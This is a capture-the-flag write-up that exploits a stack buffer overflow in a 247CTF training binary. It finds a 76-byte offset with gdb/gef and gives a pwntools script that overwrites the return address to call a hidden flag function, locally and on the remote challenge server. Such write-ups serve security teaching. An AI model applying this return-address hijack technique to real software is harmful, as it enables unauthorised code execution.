![ddcb5a5a1cceac2f48661f5a7bbc1985.png](621452062d74478d83b37c8a53a63256.png)
Let's run it and see what we get
![b9727400a632351051e9842eece27e50.png](46b8f6ff51f84fccb089f2c56ad3610a.png)
Just takes some input.
Lets use **gdb** (with **gef**) to analyze the binary.
First, find the function
`info functions`
![c64b2a158a4b06d416f55536a7f5df04.png](ce40a315a501456b8cbe5ba23667f095.png)
So the function we want is at `0x08048576`
Next, find the offset
1. Create a pattern
`pattern create 100`
2. Send that to the program by first running it with **r**
Nice! We get a **segfault**
![24b8793fb9f7cd3ea645f0d1c84cd599.png](c6722ae3e7d541058fbf29bd69068451.png)
**gdb** is telling us that the segfault is at `0x61616174`. Let's use that as our pattern search parameter to find the offset
`pattern search 0x61616174`
![5136d287918a16a14b649dc59e7d80d3.png](eec12c0426fe4328870d4041da859783.png)
There's our offset! **76**
We can test this by using **pi** in **gef** and sending the output into the program.
`pi print('A'*76 + 'B'*4)`
![9b9424712ed54c405caf261ebf9f933d.png](7d04c82e06d9464381202e72ebb1e1fb.png)
If all goes well, it should fill the buffer with **41** and overwrite the instruction pointer with `0x424242` *(A = 41, B = 42)*
![911c20500bb29f3bdcdbf635c9de9477.png](8a131153f51f4597928701aeb0941815.png)
Cool, so we control the instruction pointer now.
Now that we know the **offset** and the **function address**, we can write an exploit.
Here's my code:
```Python
#importing the pwntools library
from pwn import *
#creating the process
io = process('./hidden_flag_function')
#creating the connection to the server
#io = remote('1e9f746024b2e701.247ctf.com', 50254)
#setting the padding and function location variables
padding = b'A' * 76
funcloc = 0x08048576
#attaching the process to GDB for debugging
gdb.attach(io)
#recieving one line
io.recvline()
#sending the payload
io.sendline(padding + p32(funcloc))
#recieving 3 lines
print(io.recvline())
print(io.recvline())
print(io.recvline())
```
![5c1fdce0faeed3a1f324fb95b869c0a0.png](ed473bb5148743bd858fbed68d9cf671.png)
Looks good! Looks like we called the `flag()` function which then called `fgets()` and it broke. Let's fire it at the service by uncommenting the `io = remote()` line, and commenting out the `gdb.attach(io)` and `io = process()` lines
![21f5ff54dd607ff2a97cb9b8aebbe7a5.png](fb41f06c46e24561b84c17bb0b31b7f0.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #buffer_overflow #exploit_development #pwn #scripting #gdb #gef
Related: